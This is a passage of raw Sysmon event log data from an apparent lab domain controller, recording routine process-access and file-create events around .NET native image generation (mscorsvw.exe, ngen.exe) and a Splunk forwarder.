indows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007742Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:18.383{08A6967A-463E-6000-8903-000000009A01}4216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1078-0\Microsoft.GroupPolicy.ServerAdminTools.Private.GpmgmtpLib.dll2021-01-14 13:25:18.383 10341000x80000000000000007741Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.336{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-463E-6000-8903-000000009A01}4216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007740Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.320{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-463E-6000-8903-000000009A01}4216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007739Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.320{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-463E-6000-8903-000000009A01}4216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007738Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.289{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-463E-6000-8803-000000009A01}4468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007737Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.273{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-463E-6000-8803-000000009A01}4468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007736Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.273{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-463E-6000-8803-000000009A01}4468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007735Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:18.258{08A6967A-463E-6000-8703-000000009A01}2280C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\8e8-0\Microsoft.GroupPolicy.Commands.dll2021-01-14 13:25:18.258 10341000x80000000000000007734Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.101{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-463E-6000-8703-000000009A01}2280C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007733Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.086{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-463E-6000-8703-000000009A01}2280C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007732Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.086{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-463E-6000-8703-000000009A01}2280C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 11241100x80000000000000007731Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:18.070{08A6967A-463D-6000-8603-000000009A01}3900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f3c-0\Microsoft.GroupPolicy.Commands.dll2021-01-14 13:25:18.070 10341000x80000000000000007809Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.679{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-463F-6000-9703-000000009A01}856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007808Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.664{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-463F-6000-9703-000000009A01}856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007807Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.664{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-463F-6000-9703-000000009A01}856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007806Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.601{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-463F-6000-9603-000000009A01}5048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007805Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.586{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-463F-6000-9603-000000009A01}5048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007804Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.586{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-463F-6000-9603-000000009A01}5048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007803Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.508{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-463F-6000-9503-000000009A01}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007802Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.492{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-463F-6000-9503-000000009A01}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007801Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.492{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-463F-6000-9503-000000009A01}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007800Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.336{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-463F-6000-9403-000000009A01}3144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007799Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.320{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-463F-6000-9403-000000009A01}3144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007798Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.320{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-463F-6000-9403-000000009A01}3144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007797Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.258{08A6967A-463F-6000-9303-000000009A01}37764580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007796Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:19.101{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-463F-6000-9303-000000009A01}3776C:\Program 